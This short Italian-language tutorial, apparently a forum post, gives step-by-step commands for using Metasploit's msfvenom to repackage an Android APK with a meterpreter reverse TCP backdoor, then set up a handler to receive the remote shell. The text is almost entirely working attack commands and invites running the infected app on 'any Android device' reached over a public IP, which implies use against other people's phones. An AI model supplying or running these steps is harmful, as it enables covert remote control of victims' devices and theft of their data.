Puoi scaricare Metasploit dal sito ufficiale e tramite i seguenti comandi potrai creare la tua backdoor:
msfvenom -x nomeapkoriginal.apk -p android/meterpreter/reverse_tcp LHOST="il tuo ip interno o se hai eseguito il port forwarding il tuo ip pubblico" PORT="una porta a piacere, 4444" R > nomeapk-backdoored.apk
msfconsole (interfaccia da riga di comando di metasploit)
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST il tuo ip settato in precedenza in msfvenom
set LPORT 4444
exploit/ run
Avvia la tua app infetta su qualunque dispositivo android se hai usato l'ip pubblico sennò usa il tuo telefono
Ora dovresti avere la tua sessione meterpreter attiva